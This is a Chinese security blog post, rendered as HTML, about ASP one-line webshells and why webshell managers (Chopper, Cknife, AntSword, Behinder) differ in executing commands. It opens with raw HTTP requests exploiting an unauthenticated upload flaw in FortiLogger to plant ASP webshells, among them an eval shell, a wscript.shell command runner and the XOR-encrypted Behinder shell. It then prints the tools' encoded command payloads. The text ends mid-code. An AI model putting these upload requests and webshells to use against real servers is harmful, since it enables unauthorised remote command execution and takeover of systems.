

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/Avatar.jpg">
  <link rel="icon" href="/img/Avatar.jpg">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="在编写POC的过程中接触到asp的一句话木马，但是不同的webshell管理工具执行效果不同，有的命令执行失败有的可能成功，那么webshell管理工具是怎么连接并处理一句话？于是进行了探究">
  <meta name="author" content="corp0ra1">
  <meta name="keywords" content="">
  
  <title>asp一句话与webshell管理工具. - corp0ra1&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.6.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"corp0ra1.github.io","root":"/","version":"1.8.10","typing":{"enable":true,"typeSpeed":80,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":"a1a4ccab78dfa522556928ac810fa739","google":"G-4X9XV0H0D5","gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="corp0ra1's Blog" type="application/atom+xml">
</head>


<body>
  <header style="height: 60vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
    <div class="container">
        <a class="navbar-brand" href="/">&nbsp;<strong>Corp0ra1's Blog</strong>&nbsp;</a>

        <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

        <!-- Collapsible content -->
        <div class="collapse navbar-collapse" id="navbarSupportedContent">
            <ul class="navbar-nav ml-auto text-center">
                
                    
                        
                            
                                
                                        <li class="nav-item">
                                            <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
                                        </li>
                                        
                                            
                    
                        
                            
                                
                                        <li class="nav-item">
                                            <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
                                        </li>
                                        
                                            
                    
                        
                            
                                
                                        <li class="nav-item">
                                            <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
                                        </li>
                                        
                                            
                    
                        
                            
                                
                                        <li class="nav-item">
                                            <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
                                        </li>
                                        
                                            
                    
                        
                            
                                
                                        <li class="nav-item">
                                            <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
                                        </li>
                                        
                                            
                                                
                                                    <li class="nav-item" id="search-btn">
                                                        <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
                                                    </li>
                                                    
                                                        
                                                            <li class="nav-item" id="color-toggle-btn">
                                                                <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
                                                            </li>
                                                            
                                                                <li class="nav-item">
                                                                    <a class="nav-link" href="/atom.xml">
                                                                        <i class="iconfont icon-rss"></i>
                                                                    </a>
                                                                </li>
            </ul>
        </div>
    </div>
</nav>
    <div class="banner" id="banner" parallax=true
         style="background: url('/img/tesla.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="asp一句话与webshell管理工具.">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-06-25 00:00" pubdate>
        2021年6月25日 凌晨
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      4.8k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      76
       分钟
    </span>
  

  
  
    
      <!-- 不蒜子统计文章PV -->
      <span id="busuanzi_container_page_pv" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="busuanzi_value_page_pv"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

    <div class="container-fluid nopadding-x">
        <div class="row nomargin-x">
            <div class="d-none d-lg-block col-lg-2"></div>
            <div class="col-lg-8 nopadding-x-md">
                <div class="container nopadding-x-md" id="board-ctn">
                    <div class="py-5" id="board">
                        <article class="post-content mx-auto">
                            <!-- SEO header -->
                            <h1 style="display: none">
                                asp一句话与webshell管理工具.
                            </h1>
                            <div class="markdown-body">
                                <h1 id="FortiLogger"><a href="#FortiLogger" class="headerlink" title="FortiLogger"></a>FortiLogger</h1><blockquote>
<p><a target="_blank" rel="noopener" href="https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-3378.yaml">https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-3378.yaml</a></p>
</blockquote>
<h1 id="pyaload"><a href="#pyaload" class="headerlink" title="pyaload"></a>pyaload</h1><h2 id="访问所上传的文件"><a href="#访问所上传的文件" class="headerlink" title="访问所上传的文件"></a>访问所上传的文件</h2><figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs jsx">GET /Assets/temp/hotspot/img/logohotspot.asp HTTP/<span class="hljs-number">1.1</span><br><span class="hljs-attr">Host</span>: <span class="hljs-number">192.168</span><span class="hljs-number">.8</span><span class="hljs-number">.134</span>:<span class="hljs-number">5000</span><br>User-Agent: Mozilla/<span class="hljs-number">5.0</span> (Windows NT <span class="hljs-number">10.0</span>; Win64; x64; rv:<span class="hljs-number">89.0</span>) Gecko/<span class="hljs-number">20100101</span> Firefox/<span class="hljs-number">89.0</span><br></code></pre></td></tr></table></figure>

<h2 id="上传文本文件"><a href="#上传文本文件" class="headerlink" title="上传文本文件"></a>上传文本文件</h2><figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs jsx">POST /Config/SaveUploadedHotspotLogoFile HTTP/<span class="hljs-number">1.1</span><br><span class="hljs-attr">Host</span>: <span class="hljs-number">192.168</span><span class="hljs-number">.8</span><span class="hljs-number">.134</span>:<span class="hljs-number">5000</span><br>User-Agent: Mozilla/<span class="hljs-number">5.0</span><br>X-Requested-With: XMLHttpRequest<br>Content-Type: multipart/form-data; boundary=---------------------------<span class="hljs-number">21652089143975679907443057156</span><br>Content-Length: <span class="hljs-number">223</span><br><br>-----------------------------<span class="hljs-number">21652089143975679907443057156</span><br>Content-Disposition: form-data; name=<span class="hljs-string">&quot;file&quot;</span>; filename=<span class="hljs-string">&quot;1.txt&quot;</span><br>Content-Type: image/png<br><br><span class="hljs-number">1231231</span><br>-----------------------------<span class="hljs-number">21652089143975679907443057156</span>--<br></code></pre></td></tr></table></figure>

<h2 id="上传一句话"><a href="#上传一句话" class="headerlink" title="上传一句话"></a>上传一句话</h2><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs go">POST /Config/SaveUploadedHotspotLogoFile HTTP/<span class="hljs-number">1.1</span><br>Host: <span class="hljs-number">192.168</span><span class="hljs-number">.8</span><span class="hljs-number">.134</span>:<span class="hljs-number">5000</span><br>User-Agent: Mozilla/<span class="hljs-number">5.0</span><br>X-Requested-With: XMLHttpRequest<br>Content-Type: multipart/form-data; boundary=--------------------------<span class="hljs-number">-21652089143975679907443057156</span><br>Content-Length: <span class="hljs-number">223</span><br><br>----------------------------<span class="hljs-number">-21652089143975679907443057156</span><br>Content-Disposition: form-data; name=<span class="hljs-string">&quot;file&quot;</span>; filename=<span class="hljs-string">&quot;1.asp&quot;</span><br>Content-Type: image/png<br><br>&lt;%eval request(<span class="hljs-string">&quot;chopper&quot;</span>)%&gt;<br>----------------------------<span class="hljs-number">-21652089143975679907443057156</span>--<br></code></pre></td></tr></table></figure>

<h2 id="上传直接执行的命令"><a href="#上传直接执行的命令" class="headerlink" title="上传直接执行的命令"></a>上传直接执行的命令</h2><figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs jsx">POST /Config/SaveUploadedHotspotLogoFile HTTP/<span class="hljs-number">1.1</span><br><span class="hljs-attr">Host</span>: <span class="hljs-number">192.168</span><span class="hljs-number">.8</span><span class="hljs-number">.134</span>:<span class="hljs-number">5000</span><br>User-Agent: Mozilla/<span class="hljs-number">5.0</span><br>X-Requested-With: XMLHttpRequest<br>Content-Type: multipart/form-data; boundary=---------------------------<span class="hljs-number">21652089143975679907443057156</span><br>Content-Length: <span class="hljs-number">311</span><br><br>-----------------------------<span class="hljs-number">21652089143975679907443057156</span><br>Content-Disposition: form-data; name=<span class="hljs-string">&quot;file&quot;</span>; filename=<span class="hljs-string">&quot;1.asp&quot;</span><br>Content-Type: image/png<br><br>&lt;%<br>Response.write CreateObject(<span class="hljs-string">&quot;wscript.shell&quot;</span>).exec(<span class="hljs-string">&quot;cmd.exe /c ipconfig&quot;</span>).StdOut.ReadAll<br>%&gt;<br>-----------------------------<span class="hljs-number">21652089143975679907443057156</span>--<br></code></pre></td></tr></table></figure>

<h2 id="上传冰蝎"><a href="#上传冰蝎" class="headerlink" title="上传冰蝎"></a>上传冰蝎</h2><figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs jsx">POST /Config/SaveUploadedHotspotLogoFile HTTP/<span class="hljs-number">1.1</span><br><span class="hljs-attr">Host</span>: <span class="hljs-number">192.168</span><span class="hljs-number">.8</span><span class="hljs-number">.134</span>:<span class="hljs-number">5000</span><br>User-Agent: Mozilla/<span class="hljs-number">5.0</span><br>X-Requested-With: XMLHttpRequest<br>Content-Type: multipart/form-data; boundary=---------------------------<span class="hljs-number">21652089143975679907443057156</span><br>Content-Length: <span class="hljs-number">500</span><br><br>-----------------------------<span class="hljs-number">21652089143975679907443057156</span><br>Content-Disposition: form-data; name=<span class="hljs-string">&quot;file&quot;</span>; filename=<span class="hljs-string">&quot;1.asp&quot;</span><br>Content-Type: image/png<br><br>&lt;%<br>Response.CharSet = <span class="hljs-string">&quot;UTF-8&quot;</span> <br>k=<span class="hljs-string">&quot;e45e329feb5d925b&quot;</span> <span class="hljs-string">&#x27;åÆ¥:Þ¥Æ32Mmd5&lt;M16MØ¤Þ¥Ærebeyond</span><br><span class="hljs-string">Session(&quot;k&quot;)=k</span><br><span class="hljs-string">size=Request.TotalBytes</span><br><span class="hljs-string">content=Request.BinaryRead(size)</span><br><span class="hljs-string">For i=1 To size</span><br><span class="hljs-string">result=result&amp;Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1)))</span><br><span class="hljs-string">Next</span><br><span class="hljs-string">execute(result)</span><br><span class="hljs-string">%&gt;</span><br><span class="hljs-string">-----------------------------21652089143975679907443057156--</span><br></code></pre></td></tr></table></figure>

<h2 id="C刀访问一句话的post数据"><a href="#C刀访问一句话的post数据" class="headerlink" title="C刀访问一句话的post数据"></a>C刀访问一句话的post数据</h2><figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs jsx">POST /Assets/temp/hotspot/img/logohotspot.asp HTTP/<span class="hljs-number">1.1</span><br>User-Agent:  Mozilla/<span class="hljs-number">5.0</span> (Windows NT <span class="hljs-number">10.0</span>; Win64; x64) AppleWebKit/<span class="hljs-number">537.36</span> (KHTML, like Gecko) Chrome/<span class="hljs-number">73.0</span><span class="hljs-number">.3683</span><span class="hljs-number">.103</span> Safari/<span class="hljs-number">537.36</span><br><span class="hljs-attr">Host</span>: <span class="hljs-number">192.168</span><span class="hljs-number">.8</span><span class="hljs-number">.134</span>:<span class="hljs-number">5000</span><br><span class="hljs-attr">Accept</span>: text/html, image/gif, image/jpeg, *; q=<span class="hljs-number">.2</span>, *<span class="hljs-comment">/*; q=.2</span><br><span class="hljs-comment">Content-type: application/x-www-form-urlencoded</span><br><span class="hljs-comment">Content-Length: 969</span><br><span class="hljs-comment">Connection: close</span><br><span class="hljs-comment"></span><br><span class="hljs-comment">chopper=Execute(&quot;Execute(&quot;&quot;On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(&quot;&quot;&quot;&quot;-&gt;|&quot;&quot;&quot;&quot;):Execute(&quot;&quot;&quot;&quot;On+Error+Resume+Next:&quot;&quot;&quot;&quot;%26bd(&quot;&quot;&quot;&quot;44696D20533A533D5365727665722E4D61707061746828222E2229266368722839293A53455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A496620457272205468656E3A4572722E436C6561723A456C73653A466F722045616368204420696E20432E4472697665733A533D5326442E44726976654C657474657226636872283538293A4E6578743A456E642049663A526573706F6E73652E5772697465285329&quot;&quot;&quot;&quot;)):Response.Write(&quot;&quot;&quot;&quot;|&lt;-&quot;&quot;&quot;&quot;):Response.End&quot;&quot;)&quot;)</span><br></code></pre></td></tr></table></figure>

<h2 id="蚁剑访问一句话的post数据"><a href="#蚁剑访问一句话的post数据" class="headerlink" title="蚁剑访问一句话的post数据"></a>蚁剑访问一句话的post数据</h2><figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs jsx">POST /Assets/temp/hotspot/img/logohotspot.asp HTTP/<span class="hljs-number">1.1</span><br><span class="hljs-attr">Host</span>: <span class="hljs-number">192.168</span><span class="hljs-number">.8</span><span class="hljs-number">.134</span>:<span class="hljs-number">5000</span><br>Accept-Encoding: gzip, deflate<br>User-Agent: Opera/<span class="hljs-number">9.80</span> (X11; Linux i686; U; ja) Presto/<span class="hljs-number">2.7</span><span class="hljs-number">.62</span> Version/<span class="hljs-number">11.01</span><br>Content-Type: application/x-www-form-urlencoded<br>Content-Length: <span class="hljs-number">2047</span><br><span class="hljs-attr">Connection</span>: close<br><br>c498f64f149e9d=&amp;chopper=<span class="hljs-built_in">eval</span>(%22Ex%<span class="hljs-number">22</span>%26cHr(<span class="hljs-number">101</span>)%<span class="hljs-number">26</span>%22cute(%<span class="hljs-number">22</span>%22Server.ScriptTimeout%3D3600%3AOn%20<span class="hljs-built_in">Error</span>%20Resume%20Next%3AFunction%20bd(byVal%20s)%3AFor%20i%3D1%20To%20Len(s)%20Step%<span class="hljs-number">202</span>%3Ac%3DMid(s%2Ci%2C2)%3AIf%20IsNumeric(Mid(s%2Ci%2C1))%20Then%3AExecute(%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%22bd%3Dbd%26chr(%26H%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%26c%<span class="hljs-number">26</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>)%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>)%3AElse%3AExecute(%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%22bd%3Dbd%26chr(%26H%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%26c%26Mid(s%2Ci%2B2%2C2)%<span class="hljs-number">26</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>)%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>)%3Ai%3Di%2B2%3AEnd%20If%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%26chr(<span class="hljs-number">10</span>)%<span class="hljs-number">26</span>%<span class="hljs-number">22</span>%22Next%3AEnd%20<span class="hljs-built_in">Function</span>%3AResponse.Write(%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22499</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">26</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%22be0e%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>)%3AEx%<span class="hljs-number">22</span>%26cHr(<span class="hljs-number">101</span>)%<span class="hljs-number">26</span>%22cute(%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%22On%20<span class="hljs-built_in">Error</span>%20Resume%20Next%3A%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%26bd(%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%2253657420507574456E763D4372656174654F626A6563742822575363726970742E5368656C6C22292E456E7669726F6E6D656E74282250726F6365737322293A656E767374723D53706C69742822222662642852657175657374282263343938663634663134396539642229292622222C20227C7C7C61736C696E657C7C7C22293A466F72204561636820656E766C696E6520696E20656E767374723A4966204C656E28656E766C696E65293E30205468656E3A73733D53706C697428656E766C696E652C20227C7C7C61736B65797C7C7C22293A507574456E76287373283029293D73732831293A456E642049663A4E6578743A53657420583D4372656174654F626A6563742822777363726970742E7368656C6C22292E65786563282222222226626428526571756573742822746533333937393739396339633222292926222222202F6320222222266264285265717565737428226F643631663338333930653565372229292622222222293A496620457272205468656E3A533D225B4572725D2022264572722E4465736372697074696F6E3A4572722E436C6561723A456C73653A4F3D582E5374644F75742E52656164416C6C28293A453D582E5374644572722E52656164416C6C28293A533D4F26453A456E642049663A526573706F6E73652E7772697465285329%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>))%3AResponse.Write(%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%222d40%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">26</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">224432</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>)%3AResponse.End%<span class="hljs-number">22</span>%<span class="hljs-number">22</span>)%<span class="hljs-number">22</span>)&amp;od61f38390e5e7=6364202F642022433A2F50726F6772616D2046696C65732F525A4B2F466F7274696C6F676765722F5765622F4173736574732F74656D702F686F7473706F742F696D67222677686F616D69266563686F20626237353136266364266563686F203065316130303330&amp;te33979799c9c2=636D64<br></code></pre></td></tr></table></figure>

<h1 id="一句话木马"><a href="#一句话木马" class="headerlink" title="一句话木马"></a>一句话木马</h1><h2 id="研究背景-为什么要去研究"><a href="#研究背景-为什么要去研究" class="headerlink" title="研究背景-为什么要去研究"></a>研究背景-为什么要去研究</h2><h3 id="操作过程"><a href="#操作过程" class="headerlink" title="操作过程"></a>操作过程</h3><p>针对同样的一句话木马</p>
<ol>
<li><strong>连马操作一</strong>：简单的post一个参数过去后，执行失败，显示内部服务器错误</li>
<li><strong>连马操作二</strong>：采取菜刀之后，还是执行命令失败，但是文件管理操作可以成功。</li>
<li><strong>小插曲</strong>：菜刀没有代理功能，无法知道post过去的数据，故采取C刀，C刀和菜刀payload差不多，但是支持代理</li>
<li><strong>连马操作三</strong>：C刀执行命令执行依然失败，文件管理可以成功</li>
<li><strong>连马操作四</strong>：蚁剑链接上述木马，命令执行成功，文件也可以管理</li>
</ol>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/newBlogPhoto/%E4%B8%80%E5%8F%A5%E8%AF%9D%E4%B8%8Ewebshell%E7%AE%A1%E7%90%86%E5%B7%A5%E5%85%B7/Untitled.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/newBlogPhoto/%E4%B8%80%E5%8F%A5%E8%AF%9D%E4%B8%8Ewebshell%E7%AE%A1%E7%90%86%E5%B7%A5%E5%85%B7/Untitled%201.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/newBlogPhoto/%E4%B8%80%E5%8F%A5%E8%AF%9D%E4%B8%8Ewebshell%E7%AE%A1%E7%90%86%E5%B7%A5%E5%85%B7/Untitled%202.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/newBlogPhoto/%E4%B8%80%E5%8F%A5%E8%AF%9D%E4%B8%8Ewebshell%E7%AE%A1%E7%90%86%E5%B7%A5%E5%85%B7/Untitled%203.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="结果发现"><a href="#结果发现" class="headerlink" title="结果发现"></a>结果发现</h3><p>上述一连串操作后发现：针对同一个木马，蚁剑和C刀post发过去的流量也差不多，但是蚁剑命令执行成功，C刀却不行？无非就是bd字符串蚁剑的多一些？为什么会出现这种差异？</p>
<p>先想着直接用ASP逆向解密的载荷bd字符串内容，但是尝试半天发现难度系数过大（太菜了），于是选择看源码，在源码里面找</p>
<h3 id="上述流畅操作的背后心酸之路-TL-DR"><a href="#上述流畅操作的背后心酸之路-TL-DR" class="headerlink" title="上述流畅操作的背后心酸之路 TL;DR"></a>上述流畅操作的背后心酸之路 TL;DR</h3><p>为什么上述操作</p>
<ol>
<li>最早以为asp一句话木马和php一句话木马一样，直接post一个<code>cmd=whoami</code>的参数过去即可，但是发现服务器报错，且没有像PHP一样详细的报错信息</li>
<li>我选择用菜刀连接一下，但是菜刀可以连接上，也可以管理文件，但是就是命令执行不成功，很费解</li>
<li>我选择换一个马，把木马改成冰蝎的，然后尝试，发现命令可以执行成功。</li>
<li>于是费解：为什么一句话木马不行，冰蝎的马可行？一度怀疑网上的马都是骗人的？而且冰蝎的马，最终传过去的数据最终都是落脚到<code>execute(result)</code> 上，我的一句话木马也是<code>execute(request “chopper”)</code> 的形式，怎么差距都这么大？问了下鲍磊师傅，他推荐我看下冰蝎的流量，就是传输给result的具体的是什么内容</li>
<li>一看不知道吓一跳，整了半天，冰蝎给<code>rusult</code> 变量传递过去了几乎一整个文件大小的命令，而我一句话post过去的只有短短的<code>whoami</code> 。</li>
<li>高鹏师傅也提到了“推荐我看下菜刀的流量，菜刀也不是这种传递短短的whoami的，而是更长的和冰蝎一样长的数据”，遗憾的菜刀不支持代理，从11,14,16版本都不支持，高鹏师傅又推荐C刀，C刀支持代理</li>
<li>C刀代理之后发现还是命令执行失败，想到了蚁剑也可以支持一句话木马的链接，索性一不做二不休把蚁剑下载了，也体验一下他的链接，发现蚁剑可以成功执行命令</li>
<li>对比C刀post过去的数据和蚁剑post过去的数据发现数据加密的方式一样，只是数据不同，但是蚁剑可以执行命令C刀不行？产生了巨大的疑问！</li>
<li>一开始想着用asp代码把密文解密，想着太过复杂，而且有了前面冰蝎解密的经验，想着也看C刀和蚁剑的源码，研究payload就可以</li>
<li>研究加密钱的payload，发现大体也差不多，都是调用了<code>wscript.shell</code>执行命令，其他地方也只有细微的函数区分，但是也分不清了，就这样了，不深入分析具体区别了（我是废物）emm</li>
</ol>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/newBlogPhoto/%E4%B8%80%E5%8F%A5%E8%AF%9D%E4%B8%8Ewebshell%E7%AE%A1%E7%90%86%E5%B7%A5%E5%85%B7/Untitled%204.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="https://raw.githubusercontent.com/corp0ra1/BlogPhoto/master/newBlogPhoto/%E4%B8%80%E5%8F%A5%E8%AF%9D%E4%B8%8Ewebshell%E7%AE%A1%E7%90%86%E5%B7%A5%E5%85%B7/Untitled%205.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="Cknife"><a href="#Cknife" class="headerlink" title="Cknife"></a>Cknife</h2><h3 id="命令生成"><a href="#命令生成" class="headerlink" title="命令生成"></a>命令生成</h3><figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs jsx"><span class="hljs-comment">//配置文件：config.ini</span><br>ASP_MAKE=Execute(<span class="hljs-string">&quot;Execute(&quot;</span><span class="hljs-string">&quot;On+Error+Resume+Next\:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function\:Response.Write(&quot;</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;-&gt;|&quot;</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;)\:Execute(&quot;</span><span class="hljs-string">&quot;&quot;</span><span 